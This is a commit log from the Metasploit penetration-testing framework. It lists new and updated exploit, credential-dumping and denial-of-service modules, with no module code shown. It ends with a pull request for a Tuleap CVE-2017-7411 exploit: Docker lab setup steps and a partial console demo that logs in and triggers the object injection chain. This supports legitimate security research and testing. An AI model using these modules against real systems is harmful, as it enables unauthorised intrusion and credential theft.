Brent Cook b13f4e25e1 thanks for making this well-known 2017-12-04 18:32:31 -06:00
Brent Cook a27bb38d51 add authors 2017-12-04 18:25:18 -06:00
Austin b96dac28d5 fix info segment 2017-12-04 16:42:41 -05:00
Austin b7f17f5519 fix documentation 2017-12-04 16:41:27 -05:00
Brent Cook f83e9815dd Land #9210, Add a Polycom HDX RCE 2017-12-04 12:49:35 -06:00
Brent Cook 7edab268f5 handle case-insensitive password, fix received 2017-12-04 12:47:40 -06:00
Austin 06334aa2bd Update polycom_hdx_traceroute_exec.rb 2017-12-04 11:05:01 -05:00
Yorick Koster 942e44ceae Added local copies of the static content 2017-12-02 10:14:14 +01:00
wetw0rk 4cbb5f2619 added new target 2017-12-01 18:35:45 -06:00
Jacob Robles c79186593a Update DiskBoss Module (EDB 42395)
Added a new target option for the
DiskBoss Server.
2017-12-01 15:08:57 -06:00
Metasploit fd1681edd9 Bump version of framework to 4.16.22 2017-12-01 10:04:07 -08:00
Austin c788e4e540 Update office_ms17_11882.rb 2017-12-01 11:36:03 -05:00
Austin 7df46b33e8 disassembly ASM 2017-12-01 08:03:56 -05:00
Jon Hart 73742d7de5 Land @busterb's #9261, which makes the default prompt include the longer name of the module,
avoiding ambiguity and providing more context
2017-11-30 12:45:31 -08:00
Zenofex 1ced3994b0 Added more reference urls to wd_mycloud_multiupload_upload module. 2017-11-30 12:53:33 -06:00
nromsdahl b24f70c7c6 Update ssh_login.rb
Added credential data type so password is stored in creds.
2017-11-30 11:02:06 -06:00
Brent Cook 09dd5b8489 fix check command to not require an rport _method_ 2017-11-30 10:51:21 -06:00
Brent Cook c288dab338 fixup RHOST/RPORT expectations if only URI is set 2017-11-30 10:51:02 -06:00
Brent Cook d689b33d7e more error handling, deal with user error 2017-11-30 08:31:13 -06:00
Brent Cook 87e683c763 add back kill syscall for trap method 2017-11-30 08:12:15 -06:00
Brent Cook a0e0e1db15 allow manual targeting, handle errors better 2017-11-30 07:51:12 -06:00
Brent Cook eea72663b3 warn on method failure instead of error 2017-11-30 06:37:21 -06:00
Brent Cook 9f12b794da cleanup comments 2017-11-30 06:37:04 -06:00
Brent Cook 5da34e8f2b support RHOST/RPORT 2017-11-30 06:36:42 -06:00
Brent Cook 59580195b4 resurrect old methods, try all 3 2017-11-30 06:16:05 -06:00
Brent Cook c848379ecb simply use refname in the prompt? 2017-11-29 20:52:14 -06:00
Brent Cook e5a5d35ad8 add 'promptname' that expands the module path a bit more
This allows the user to actually see the module context.
2017-11-29 19:49:43 -06:00
Brent Cook 55f56a5350 Land #9110, added -C option to change default hosts columns 2017-11-29 17:48:44 -06:00
Brent Cook 51a18b68fe Land #9211, handle 2016 DC's with hashdump gracefully 2017-11-29 17:26:33 -06:00
Brent Cook 0aeb245c9c Land #9252, docker improvements 2017-11-29 17:15:47 -06:00
Brent Cook 7218159179 Land #9260, add new meterpreter functionality 2017-11-29 17:12:49 -06:00
Brent Cook edb2d8b762 fix windows unicode usernames, add recursive directory delete 2017-11-29 17:01:01 -06:00
bwatters-r7 e8965767a0 Land 9207, Expose more uuid attributes 2017-11-29 16:25:05 -06:00
Metasploit 174d0d46de Bump version of framework to 4.16.21 2017-11-29 10:45:55 -08:00
Brent Cook 70ec576d52 use correct session variable 2017-11-29 11:53:56 -06:00
Brent Cook ec2b5d48a6 add missing payload uuid accessors 2017-11-29 11:49:41 -06:00
Brent Cook 446f3fa675 more conversions 2017-11-29 11:49:41 -06:00
Brent Cook 59446f3d96 change ui to use new settings 2017-11-29 11:49:41 -06:00
Brent Cook 8051f790d0 if there is info in the uuid_db, put it in payload_uuid automatically 2017-11-29 11:49:41 -06:00
Brendan Coles 775529277f Add documentation 2017-11-29 17:37:34 +00:00
bwatters-r7 c695828361 Land #9255, add local exploit for osx root login with no password 2017-11-29 10:30:59 -06:00
bwatters-r7 9dc3d60fc2 Stupid Typos 2017-11-29 10:29:38 -06:00
Jeffrey Martin e73ba0b3ca Merge released '4.x' into master 2017-11-29 10:27:42 -06:00
bwatters-r7 efa8d566d7 Added documentation for iamroot 2017-11-29 10:26:06 -06:00
Brendan Coles 283b7c5145 Add WS-Discovery Information Discovery module 2017-11-29 12:21:22 +00:00
Tim W 58897bf2fc msftidy 2017-11-29 16:36:50 +08:00
Tim W 7f1f7281f1 add local exploit for osx root login with no password 2017-11-29 16:06:02 +08:00
Brent Cook 19a62d6c82 Land #9254, Fix include scope in external module mixin 2017-11-28 21:49:27 -06:00
Adam Cammack 3fff092042 Fix include scope in external module mixin
The auxiliary report mixin overrides some of the methods in
Metasploit::Credential, which is fine in framework, but causes issues in
projects relying on the base behavior of Metasploit::Credential. This
changes the include scope from global to just whatever includes the
external module mixin.
2017-11-28 21:41:52 -06:00
Austin 676a08b849 Update polycom_hdx_traceroute_exec.rb 2017-11-28 22:01:41 -05:00
Austin 2544b4d8db Change target name 2017-11-28 21:39:04 -05:00
Austin cb7f173811 Update office_ms17_11882.rb 2017-11-28 21:36:25 -05:00
William Vu f132c1572f Fix #9194, clarified error for reloading modules 2017-11-28 17:15:56 -06:00
William Vu f55ff36d1e Land #9253, debug print for CmdStager 2017-11-28 16:46:54 -06:00
William Vu 7b3bf85d03 Print the generated command stager for debugging 2017-11-28 16:00:28 -06:00
Christian Mehlmauer 0d38b70763 make travis build the image again 2017-11-28 21:59:26 +01:00
Christian Mehlmauer 50351320d7 more docker work 2017-11-28 21:35:20 +01:00
Zenofex d174ef3a70 Add wd_mycloud_multiupload_upload exploit 2017-11-28 07:12:00 -06:00
Pearce Barry 60111adae6 Land #2, OSX support tweaks and improvements to extension suffix handling. 2017-11-27 11:41:43 -06:00
William Vu 65412cd2f1 Land #9201, enhanced tab completion 2017-11-27 11:37:04 -06:00
bwatters-r7 244acc48b6 Land #9212, pfsense group member exec module 2017-11-27 11:27:29 -06:00
Brent Cook 047aef6062 Land #9243, Windows Meterpreter fixes 2017-11-25 18:38:29 -06:00
Brent Cook 035d1ef2c6 bump payloads, pull in AES negotation & transport fixes 2017-11-25 18:21:57 -06:00
Brent Cook 2c6cfabbc3 Land #8948, allow configuring payload HTTP headers for domain fronting 2017-11-25 10:08:22 -06:00
Brent Cook 8645a518b3 add mettle support for custom headers 2017-11-24 20:27:34 -06:00
Metasploit c9da8f7a18 Bump version of framework to 4.16.20 2017-11-24 10:01:50 -08:00
William Webb 78e4b2b8dc Land #9238, Add support for Windows .NET Server in ms10_015_kitrap0d 2017-11-23 01:39:40 -06:00
vipzen 0d79a3a3e2 Add support to Windows .NET Server 2017-11-23 08:35:55 -02:00
WhiteWinterWolf bfd5c2d330 Keep the initial option name 'ADMIN_ROLE' 2017-11-22 22:03:56 +01:00
Adam Cammack 778e69f929 Land #9229, Randomize slowloris HTTP headers 2017-11-22 14:42:24 -06:00
Adam Cammack ccdd1cd2ce Land #9231, Properly handle external module errors 2017-11-22 14:30:24 -06:00
Pearce Barry 9e0750bbe4 Land #9235, Fix mongodb_login typo 2017-11-22 09:05:32 -06:00
attackdebris ae43883e2b Fix mongodb_login typo 2017-11-22 08:03:12 -05:00
Austin 43ff4f12e5 update docs 2017-11-22 06:57:35 -05:00
Austin 960893b99d change default payload 2017-11-22 06:36:46 -05:00
Yorick Koster a02a02cb0c Fixed URL... 2017-11-22 11:31:23 +01:00
Yorick Koster d21d3c140e Fixed date 2017-11-22 11:15:34 +01:00
Yorick Koster b5994bde79 Update pfsense_clickjacking.md 2017-11-22 11:10:47 +01:00
Yorick Koster 5b5c5520e6 Update pfsense_clickjacking.md 2017-11-22 11:09:54 +01:00
Yorick Koster 916ee05cce Add exploit module for Clickjacking vulnerability in CSRF error page pfSense 2017-11-22 11:06:22 +01:00
Tim W ce9d2aff2b more osx hacks 2017-11-22 17:25:49 +08:00
Tim W 0f2bfb70c0 hacky fix for osx 2017-11-22 13:07:42 +08:00
scriptjunkie 9a81cc70dd Fix corruption of non-latin characters in W methods 2017-11-21 20:58:38 -06:00
Austin 99555dde02 sleep! per feedback 2017-11-21 21:33:29 -05:00
Austin 73c692fb65 fix docs 2017-11-21 21:31:06 -05:00
Austin 205ded8509 Land #2 from jhart-r7/pr/fixup-9214 2017-11-21 21:22:23 -05:00
Jon Hart 5484ee840e Correct port when eating cisco config 2017-11-21 18:09:51 -08:00
Jon Hart bdc822c67d Improve logging when requesting config 2017-11-21 18:09:02 -08:00
Jon Hart 5a358db260 Clean up shutdown messaging 2017-11-21 17:55:17 -08:00
Jon Hart 93c424c255 Remove unused 2017-11-21 17:54:31 -08:00
Jon Hart b0d8b0a191 Clean up incoming file handling 2017-11-21 17:54:02 -08:00
Jon Hart 879db5cf38 Land #9050, @mpizala's improvements to the docker_daemon_tcp module 2017-11-21 17:13:24 -08:00
Austin 275f70e77e better saving 2017-11-21 19:34:04 -05:00
Austin db4c0fcca9 spelling 2017-11-21 19:02:14 -05:00
Brent Cook 81c6823b72 handle interrupt and unknown exceptions properly with external modules 2017-11-21 17:50:53 -06:00
Matthew Kienow 785e5944d6 Enhanced slowloris HTTP headers and minor cleanup 2017-11-21 18:19:20 -05:00
Adam Cammack 19844fb6ed Land #9227, Add slowloris denial of service 2017-11-21 15:42:39 -06:00
Tim 92190403cc use full target_path 2017-11-22 05:42:01 +08:00
Matthew Kienow b6c81e6da0 Reimplement slowloris as external module 2017-11-21 16:21:01 -05:00
Daniel Teixeira db2bd22d86 Update slow_loris.rb 2017-11-21 15:49:45 -05:00
Matthew Kienow e07fe77a69 Close sockets to resolve file handle error 2017-11-21 15:49:45 -05:00
Daniel Teixeira 52f56527d8 Update slow_loris.rb 2017-11-21 15:49:45 -05:00
Daniel Teixeira 74becb69e8 Update slow_loris.rb 2017-11-21 15:49:45 -05:00
Daniel Teixeira aa16288140 Update slow_loris.md 2017-11-21 15:49:45 -05:00
Daniel Teixeira 6d2007a4db Update slow_loris.md 2017-11-21 15:49:44 -05:00
Daniel Teixeira b7bc68c843 Update slow_loris.rb 2017-11-21 15:49:44 -05:00
Daniel Teixeira fbb9e9d473 Update slow_loris.md 2017-11-21 15:49:44 -05:00
Daniel Teixeira 4419c0d851 Create slow_loris.md 2017-11-21 15:49:44 -05:00
Daniel Teixeira 53123d92e2 Update slow_loris.rb 2017-11-21 15:49:44 -05:00
Daniel Teixeira 21a6d0bd6e Update slow_loris.rb 2017-11-21 15:49:44 -05:00
Daniel Teixeira 60878215e0 Update slow_loris.rb 2017-11-21 15:49:43 -05:00
Daniel Teixeira 9457359b11 Update slow_loris.rb 2017-11-21 15:49:43 -05:00
Daniel Teixeira 29017b8926 Update slow_loris.rb 2017-11-21 15:49:43 -05:00
Daniel Teixeira f79b41edde Slow Loris 2017-11-21 15:48:11 -05:00
Brent Cook a7932ffe0e fix sizes 2017-11-21 14:31:14 -06:00
Austin fcea6fd8d4 actually create new file ;-; 2017-11-21 15:00:06 -05:00
Brent Cook 4050985649 update payloads 2017-11-21 13:53:33 -06:00
OJ fea28a89a5 Fix TLV defs for http headers 2017-11-21 13:47:19 -06:00
Brent Cook ea37196614 use cooler names c/o @timwr, make options easier to grep 2017-11-21 13:47:19 -06:00
Brent Cook 85acbadf01 more DRYing 2017-11-21 13:47:19 -06:00
Brent Cook 37ab771ca9 uri is not always defined, fix python stager generation 2017-11-21 13:47:19 -06:00
Brent Cook 2076db2d61 DRY up common stager and payload http and retry options 2017-11-21 13:47:19 -06:00
Brent Cook 1fd7f7c8bc prefix MeterpreterUserAgent and PayloadProxy* with Http for consistency,
this also adds aliases where needed
2017-11-21 13:47:19 -06:00
Tim a5af21fa1a add http headers to Android/Java 2017-11-21 13:47:19 -06:00
OJ ac79cc9f78 Fix up header string generation in transports 2017-11-21 13:47:18 -06:00
OJ f6e9b12b43 Make sure stageless is supported 2017-11-21 13:47:18 -06:00
OJ 656babe9f4 Custom host header support in python meterp 2017-11-21 13:47:18 -06:00
OJ a78d8f83fc Add HTTP header support for Host/Cookie/Referer
This is to start the support for things like domain fronting.
2017-11-21 13:47:18 -06:00
Austin 39a4d193a1 Create office_ms17_11882.rb 2017-11-21 14:47:02 -05:00
Austin fcf2cfa134 Create office_ms17_11882.md 2017-11-21 14:45:56 -05:00
Brent Cook a4e199a6dd Land #9000, enhance module option registration 2017-11-21 12:09:21 -06:00
Brent Cook c5cc013819 auto-detect SSL supported options 2017-11-21 08:30:42 -06:00
Brent Cook 967b459ff1 restore default enum is first value behavior 2017-11-21 08:30:42 -06:00
Brent Cook 6615c6efc7 tighten up corner cases with option validation 2017-11-21 08:30:42 -06:00
Brent Cook 6da66e885a fix enum default logic for bools that default to false 2017-11-21 08:30:42 -06:00
Brent Cook d811a2a8c1 set good defaults 2017-11-21 02:52:05 -06:00
Brent Cook 65c58c3d55 set a good default, remove unused methods, speed up checks 2017-11-21 02:52:05 -06:00
Brent Cook ffa6d74a23 remove historical cruft 2017-11-21 02:52:05 -06:00
Brent Cook d3ee86dc5c update to new format 2017-11-21 02:52:05 -06:00
Brent Cook 249c08f597 usability improvements ith how base options are registered
This adds named parameters for all of the current array-index based
options. It also allows specifying the description as the 2nd parameter,
allowing the 'required' parameter to be implicitly false (the most
common value).

A simple parameter like:

 OptAddress.new('ReverseListenerBindAddress',
   [false, 'The specific IP address to bind to on the local system']),

Can now be rewritten as:

 OptAddress.new('ReverseListenerBindAddress',
   'The specific IP address to bind to on the local system'),

More complex options are also now easier to read:

 OptString.new(
   'HttpUserAgent',
   'The user-agent that the payload should use',
   default: Rex::UserAgent.shortest,
   aliases: ['MeterpreterUserAgent']
 ),

This also makes dealing with enums easier because default is implicit
unless specified. This:

  OptEnum.new('PayloadProxyType',
    [true, 'The proxy type, HTTP or SOCKS', 'HTTP', ['HTTP', 'SOCKS']]),

Becomes:

  OptEnum.new('HttpProxyType',
    'The proxy type, HTTP or SOCKS', required: true, enums: ['HTTP', 'SOCKS'])

This maintains full backward compatibility with existing code as well.
2017-11-21 02:52:05 -06:00
h00die dd8238d146 rubocop got a donut 2017-11-20 20:08:28 -05:00
Adam Cammack 40a71af7ed Add missing end 2017-11-20 17:50:59 -06:00
Matthew Kienow 21707cb7aa Land #9225, add external module template for DoS 2017-11-20 18:39:13 -05:00
Matthew Kienow 0fb0fab805 Landing #9224, robust external module read loop 2017-11-20 18:25:09 -05:00
Adam Cammack 2fdc34c8fd Add new template for DoS modules 2017-11-20 17:19:14 -06:00
Adam Cammack dd57138423 Make external module read loop more robust
Changes from a "hope we get at most one message at a time" model to
something beginning to resemble a state machine. Also logs error output
and fails the MSF module when the external module fails.
2017-11-20 16:52:05 -06:00
Matthew Kienow 39f06a3995 Land #8807, template for external module servers 2017-11-20 17:34:37 -05:00
Austin cfd06ab24a what was i thinking? 2017-11-20 16:08:48 -05:00
Martin Pizala 90d6165e68 bypass user namespaces docs 2017-11-19 22:10:39 +01:00
Austin b6e2e2aa45 adjust delay 2017-11-19 09:43:18 -05:00
h00die 579d012fa2 spelling 2017-11-19 08:36:27 -05:00
h00die b7f7afb3be version detect, 2.2.6 handling 2017-11-19 08:28:07 -05:00
Austin 1087b8ca16 cleanup 2017-11-18 20:09:29 -05:00
Austin 40bb622b7a update docs
Updating documentation
2017-11-18 13:07:24 -05:00
Austin 35567e3e23 Fix - copy system:running-config tftp://ip/file
Copies running config directly to TFTP server, thus removing the need to delete the file :D.
2017-11-18 13:02:12 -05:00
Austin f84f824a71 remove ? 2017-11-17 16:15:18 -05:00
Austin b457c60542 WORK IN PROGRESS - "GET"
Work in progress of GET, and PUT. PUT works fine for grabbing the configuration. GET will be used for service a config to execute commands , or the also WIP action "UPLOAD"
2017-11-17 15:36:27 -05:00
Metasploit 602406a423 Bump version of framework to 4.16.19 2017-11-17 10:02:22 -08:00
WhiteWinterWolf 2be3433bdb Update references URLs 2017-11-17 13:27:35 +01:00
Austin 8b59c4615b Update cisco_smart_install.rb 2017-11-17 07:09:41 -05:00
WhiteWinterWolf a636380e4b Merge the new method into drupal_drupageddon.rb 2017-11-17 13:00:15 +01:00
WhiteWinterWolf 704514a420 New exploit method for Drupageddon (CVE-2014-3704)
This new script exploits the same vulnerability as
 *exploits/multi/http/drupal_drupageddon.rb*, but in a more efficient way.
2017-11-16 20:47:44 +01:00
Austin feb24efd27 add DOWNLOAD action
Adds DOWNLOAD function, to download config and send to attacker TFTP server.
2017-11-16 12:58:54 -05:00
Austin 4a8d32af85 Update cisco_smart_install.rb 2017-11-16 12:53:27 -05:00
Austin 74a1b405c4 action addition DOWNLOAD 2017-11-16 12:46:31 -05:00
Metasploit 5cdd364590 Bump version of framework to 4.16.18 2017-11-15 19:46:12 -08:00
h00die f8891952c6 pfsense group member exec module 2017-11-15 21:00:58 -05:00
Adam Cammack c740f4369c Land #9197, Cleanup Mako Server exploit 2017-11-15 15:01:31 -06:00
Adam Cammack 4219959c6d Bump ranking to Excellent 2017-11-15 15:00:47 -06:00
Adam Cammack f357efd97c Land #9208, add AArch64 ELF to Msf::Util::Exe 2017-11-15 14:22:27 -06:00
bwatters-r7 83c228f3b8 Make rubocop less mad 2017-11-15 14:06:36 -06:00
bwatters-r7 33a07beb30 Fix whitespace issues 2017-11-15 12:26:49 -06:00
Austin 829a7a53db verbose response. 2017-11-15 12:27:40 -05:00
bwatters-r7 53a068d13f Add error handling for failed hashdumps 2017-11-15 11:08:35 -06:00
David Maloney 8b9e091e70 remove humorous typo 2017-11-15 11:08:25 -06:00
David Maloney 7162765b57 load extapi in domain_hashdump
domain hashdump always needs to load extapi to work
2017-11-15 11:08:17 -06:00
David Maloney ad98c9c156 fix Windows server 2016 support for domain_hashdump
The domain hashdump psot module should now work
against Server 2016 DCs.
2017-11-15 11:08:06 -06:00
Austin 4918e5856d Update polycom_hdx_traceroute_exec.rb 2017-11-15 10:41:51 -05:00
Austin d93120e2ac Create polycom_hdx_traceroute_exec.rb 2017-11-15 10:40:57 -05:00
Austin 256bf5a5ca Create polycom_hdx_traceroute_exec.md 2017-11-15 10:38:53 -05:00
Martin Pizala 33e5508bcb bypass user namespaces 2017-11-15 15:14:58 +01:00
Tim 4ec0faf35d fix aarch64 cmdstager 2017-11-15 16:47:17 +08:00
Mehmet İnce 54936b6ac3 Updatig documentation and tweaking initiate_session 2017-11-15 01:04:06 +03:00
Mehmet İnce 86e47589b0 Add xplico remote code execution 2017-11-14 09:30:57 +03:00
Jeffrey Martin 80b381cde9 Merge released '4.x' into master 2017-11-13 14:11:23 -06:00
0xFFFFFF d28ae361ca Added exploit module for Samsung SRN-1670D vuln CVE-2017-16524
Please find my exploit module for the vulnerability CVE-2017-16524 I discovered and tested on Web Viewer 1.0.0.193 on SAMSUNG SRN-1670D
2017-11-12 20:11:44 +01:00
Spencer McIntyre bc691cbd00 Document the new tab completion functions 2017-11-11 17:17:48 -05:00
Spencer McIntyre fb7635502d Tab completion for exploit and handler commands 2017-11-11 17:11:54 -05:00
Spencer McIntyre 68a43fef36 Add the new generic tab completion functoin 2017-11-11 16:47:11 -05:00
William Vu f3e2f4d500 Land #9167, D-Link DIR-850L exploit 2017-11-10 18:15:39 -06:00
William Vu 3936d3baa1 Clean up module 2017-11-10 18:15:22 -06:00
Martin Pizala 971ec80fc1 Keep the python target 2017-11-10 23:11:27 +01:00
Steven Patterson df2b62dc27 Add Mako Server CMD injection Linux support, update docs, move to multi 2017-11-10 16:28:39 -05:00
Metasploit 4f660d7dd7 Bump version of framework to 4.16.17 2017-11-10 10:05:05 -08:00
William Vu 7b5ec9d0ec Land #9193, makoserver_cmd_exec cleanup 2017-11-10 10:36:16 -06:00
Jeffrey Martin 7595c7c627 Land #9194, Add a check for .rb in cmd_edit 2017-11-09 21:56:50 -06:00
William Vu 97859ebf8c Clarify XXX comment no user will ever see anyway 2017-11-09 15:23:37 -06:00
William Vu 577baf6070 Add a check for .rb in cmd_edit 2017-11-09 15:17:53 -06:00
William Vu ea260e87b7 Remove headers, since we didn't send them before
http was an invalid key for setting headers, and we still got a shell.
These headers also don't seem relevant to the PUT request.
2017-11-09 11:06:50 -06:00
William Vu 7213e6cc49 Fix #9133, makoserver_cmd_exec cleanup 2017-11-09 10:52:03 -06:00
attackdebris 500bde1150 get_vars tweak 2017-11-09 04:16:34 -05:00
h00die 52888871e3 Land #8747 RCE for Geutebrueck GCore on Windows 2017-11-08 20:22:54 -05:00
h00die 7ad151e68b gcore formatting update 2017-11-08 20:21:40 -05:00
attackdebris a04bc0a25b Add get_vars, remove a https instance 2017-11-08 16:30:59 -05:00
Adam Cammack 39916ef61a Land #9133, Command injection in Mako Server examples 2017-11-08 15:11:01 -06:00
Patrick Webster d95b333ae9 Added exploit module for HP LoadRunner command exec vuln CVE-2010-1549. 2017-11-09 03:59:18 +11:00
William Vu b7c604f941 Land #9189, s/patrick/aushack/g 2017-11-08 10:27:03 -06:00
bwatters-r7 5a07be9b96 Land #9041, Add LPE on Windows using CVE-2017-8464 2017-11-08 10:09:03 -06:00
Patrick Webster 2f6da89674 Change author name to nick. 2017-11-09 03:00:24 +11:00
bwatters-r7 19e3e181c1 Fix compiling instructions 2017-11-08 09:36:32 -06:00
bwatters-r7 4abe8ff0d9 recompile binaries 2017-11-08 09:33:48 -06:00
bwatters-r7 9b24ed8406 Removed binaries for recompile 2017-11-08 09:26:40 -06:00
Spencer McIntyre fa8d017579 Change documentation from a first person context 2017-11-08 09:29:46 -05:00
bwatters-r7 11093b8393 Added documentation 2017-11-08 08:07:06 -06:00
RootUp 03cd8af29a Update browser_sop_bypass.rb 2017-11-08 12:50:49 +05:30
RootUp 0c247d5635 Update browser_sop_bypass.rb 2017-11-08 12:38:37 +05:30
Brent Cook 1927e8b95c Land #9187, avoid endless loop in packet recv in windows meterpreter 2017-11-07 20:59:40 -06:00
OJ 6f9671ff11 Updated Payloads version to 1.3.14 2017-11-08 12:36:50 +10:00
Spencer McIntyre c2578c1487 Refactor GetProcessSid to remove do while FALSE 2017-11-07 19:11:24 -05:00
Austin 0a4ce1e87b cmdstager build
Removes the need for HTTP Server, utilizes helper CmdStager, reduces module size.
2017-11-07 19:00:59 -05:00
Brent Cook 1f5dcfb610 Land #9185, Don't fail if mssql server does not support encryption 2017-11-07 14:36:02 -06:00
William Vu fbbc8da8fb Fix raise(s) in MSSQL client aborting mssql_login 2017-11-07 14:30:47 -06:00
Maurice Popp 6683ba501f added one missing change 2017-11-07 20:05:43 +01:00
Maurice Popp 8963d77bca multiple changes as requested by h00die 2017-11-07 20:00:56 +01:00
Pearce Barry fc87ee08d9 Land #9060, IBM Lotus Notes DoS (CVE-2017-1130). 2017-11-07 11:20:12 -06:00
attackdebris 7173e7f4b4 Add CVE to module description 2017-11-07 11:05:14 -05:00
RootUp 872894f743 Update browser_sop_bypass.rb 2017-11-07 21:29:16 +05:30
attackdebris d770406049 Add docs 2017-11-07 10:58:28 -05:00
RootUp 2fad61101e Update browser_sop_bypass.rb 2017-11-07 21:13:06 +05:30
attackdebris 371f3c333a This commit adds the jenkins_xstream_deserialize module 2017-11-07 09:46:42 -05:00
RootUp 3dad025b8c Create browser_sop_bypass.rb 2017-11-07 14:24:50 +05:30
RootUp 85b8b4116a Create ibm_lotus_notes2.md 2017-11-07 12:08:08 +05:30
William Vu 92c5b271c5 Land #9178, multi/handler enhancements rollback 2017-11-06 12:03:53 -06:00
RootUp 88db98c381 Update ibm_lotus_notes2.rb 2017-11-06 20:45:50 +05:30
Brent Cook cfeb0b7bda prefer threadsafe sleep here 2017-11-06 01:37:09 -06:00
Brent Cook 897b5b5dd1 revert passive handler stance 2017-11-06 01:37:09 -06:00
Brent Cook 6fb8928523 Land #9177, fix docker builds 2017-11-06 01:35:54 -06:00
Christian Mehlmauer 9206dee5bb disable gem update for now as version 2.7.1 is broken 2017-11-06 07:49:10 +01:00
Pearce Barry 77c13286e0 Ensure closing script tag has necessary escape. 2017-11-05 13:41:29 -06:00
Spencer McIntyre 7d1de9bc48 Fix removing the dropped files after exploitation 2017-11-04 18:50:20 -04:00
h00die c9e3b8816b remove old name 2017-11-04 13:53:04 -04:00
h00die 9236aff6ee forgot to add my docs 2017-11-04 13:51:41 -04:00
Austin 1758ed93d4 Update dlink_850l_unauth_exec.rb 2017-11-04 11:42:49 -04:00
Austin 724c5fb963 finish 2017-11-04 11:41:07 -04:00
Austin 646c7f7c0a update doc 2017-11-04 11:40:32 -04:00
Austin e783cb59ea add "check" & msftidy 2017-11-04 08:53:50 -04:00
Austin 84599ed3fc Update dlink_850l_unauth_exec.rb 2017-11-04 07:58:13 -04:00
Austin cddec8ca6c download creds, stores in loot. 2017-11-03 14:24:45 -04:00
Metasploit deb5a7b015 Bump version of framework to 4.16.16 2017-11-03 10:03:38 -07:00
Austin 40bcb3f0c8 update documentation 2017-11-03 09:09:51 -04:00
Austin 32a75e9782 Update dlink_850l_unauth_exec.rb 2017-11-03 09:02:48 -04:00
Austin 705c1cc6a7 Redo Functions 2017-11-03 08:33:42 -04:00
Austin 8c0da8ea90 Update dlink_850l_unauth_exec.rb 2017-11-03 06:24:07 -04:00
Austin af583e843c Update dlink_850l_unauth_exec.rb 2017-11-03 06:21:59 -04:00
h00die 697031eb36 mysql UDF now multi 2017-11-03 05:26:05 -04:00
Austin 5b7d803f85 Update dlink_850l_unauth_exec.rb 2017-11-02 15:57:03 -04:00
Austin caad1bbf27 Create dlink_dir850l_unauth_exec.md 2017-11-02 15:54:45 -04:00
Austin 429ac71a63 header 2017-11-02 15:53:45 -04:00
Austin 61a67efb82 annnd....it sucks 2017-11-02 15:53:09 -04:00
Metasploit a14102083c Bump version of framework to 4.16.15 2017-11-02 10:01:12 -07:00
Spencer McIntyre 70033e2b94 Enable the payload handler by default 2017-11-02 12:31:54 -04:00
bwatters-r7 c2a979dd3c Land #9134, fix buggy handling of partial ingress packet data 2017-11-01 20:06:23 -05:00
Spencer McIntyre d815e42ccf Add a generic tab completion function 2017-11-01 20:38:45 -04:00
William Vu a15b61a218 Fix #9160, exploit method from TcpServer
It already starts the server and waits for us. This is what was called
when the module was still auxiliary.
2017-11-01 19:26:00 -05:00
William Vu 57fde9d8ca Land #9160, tnftp_savefile auxiliary to exploit 2017-11-01 18:48:07 -05:00
William Vu 87934b8194 Convert tnftp_savefile from auxiliary to exploit
This has been a long time coming. Fixes #4109.
2017-11-01 17:37:41 -05:00
William Vu 972f9c08eb Land #9135, peer print for jenkins_enum 2017-11-01 15:33:13 -05:00
William Vu 77181bcc9c Prefer peer over rhost/rport 2017-11-01 15:32:32 -05:00
William Vu 0e66ca1dc0 Fix #3444/#4774, get_json_document over JSON.parse
Forgot to update these when I wrote new modules.
2017-11-01 15:05:49 -05:00
William Vu 5de190f092 Land #9145, ERB/<ruby> for Meterpreter resource 2017-11-01 13:48:51 -05:00
William Vu 7a09dcb408 Fix #9109, HttpServer (TcpServer) backgrounding 2017-11-01 13:35:04 -05:00
William Vu e3ac6b8dc2 Land #9109, wp-mobile-detector upload and execute 2017-11-01 13:25:16 -05:00
William Vu 3847a68494 Clean up module 2017-11-01 13:23:32 -05:00
Jeffrey Martin 7a21cfdfa6 add cached sizes for ppce500v2 2017-11-01 13:08:15 -05:00
Brent Cook 7895cbc413 Land #9157, Add missing ppce500v2 tests 2017-11-01 12:33:02 -05:00
Brent Cook aafc09ed85 Land #9156, remove broken bundler workaround, fix rspec 2017-11-01 12:00:44 -05:00
Jeffrey Martin 553452c19d add missing ppc500v2 payload specs 2017-11-01 12:00:03 -05:00
Jeffrey Martin cd114c90e0 remove no longer available bundler hack
This address issue #9155 for bundler failures in TravisCI
2017-11-01 11:52:41 -05:00
EgiX 0973bfb922 Update tuleap_rest_unserialize_exec.rb 2017-11-01 16:37:14 +01:00
EgiX 6985e1b940 Add module for CVE-2017-7411: Tuleap <= 9.6 Second-Order PHP Object Injection
This PR contains a module to exploit [CVE-2017-7411](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7411), a Second-Order PHP Object Injection vulnerability in Tuleap before version 9.7 that might allow authenticated users to execute arbitrary code with the permissions of the webserver. The module has been tested successfully with Tuleap versions 9.6, 8.19, and 8.8 deployed in a Docker container.

## Verification Steps

The quickest way to install an old version of Tuleap is through a Docker container. So install Docker on your system and go through the following steps:

1. Run `docker volume create --name tuleap`
2. Run `docker run -ti -e VIRTUAL_HOST=localhost -p 80:80 -p 443:443 -p 22:22 -v tuleap:/data enalean/tuleap-aio:9.6`
3. Run the following command in order to get the "Site admin password": `docker exec -ti <container_name> cat /data/root/.tuleap_passwd`
4. Go to `https://localhost/account/login.php` and log in as the "admin" user
5. Go to `https://localhost/admin/register_admin.php?page=admin_creation` and create a new user (NOT Restricted User)
6. Open a new browser session and log in as the newly created user
7. From this session go to `https://localhost/project/register.php` and make a new project (let's name it "test")
8. Come back to the admin session, go to `https://localhost/admin/approve-pending.php` and click on "Validate"
9. From the user session you can now browse to `https://localhost/projects/test/` and click on "Trackers" -> "Create a New Tracker"
10. Make a new tracker by choosing e.g. the "Bugs" template, fill all the fields and click on "Create"
11. Click on "Submit new artifact", fill all the fields and click on "Submit"
12. You can now test the MSF module by using the user account created at step n.5 

NOTE: successful exploitation of this vulnerability requires an user account with permissions to submit a new Tracker artifact or access already existing artifacts, which means it might be exploited also by a "Restricted User".

## Demonstration

```
msf > use exploit/unix/webapp/tuleap_rest_unserialize_exec 
msf exploit(tuleap_rest_unserialize_exec) > set RHOST localhost
msf exploit(tuleap_rest_unserialize_exec) > set USERNAME test
msf exploit(tuleap_rest_unserialize_exec) > set PASSWORD p4ssw0rd
msf exploit(tuleap_rest_unserialize_exec) > check 

[*] Trying to login through the REST API...
[+] Login successful with test:p4ssw0rd
[*] Updating user preference with POP chain string...
[*] Retrieving the CSRF token for login...
[+] CSRF token: 089d56ffc3888c5bc90220f843f582aa
[+] Login successful with test:p4ssw0rd
[*] Triggering the POP chain...
